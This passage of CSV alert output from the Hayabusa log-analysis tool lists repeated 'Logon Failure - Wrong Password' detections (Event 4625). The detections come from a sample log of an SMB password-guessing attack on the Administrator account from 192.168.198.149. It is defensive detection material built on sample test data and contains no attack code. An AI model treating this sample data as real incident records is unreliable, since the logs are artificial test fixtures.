Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.942 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.029 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.069 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.254 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.352 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.489 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:33.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.661 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.849 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.974 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.019 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.235 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.281 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.354 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.537 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.737 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.786 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.857 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.897 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.941 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.029 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.073 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.118 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.243 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.291 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.422 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.475 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.661 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:35.717 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.836 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.986 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.077 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.125 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.172 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.201 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 
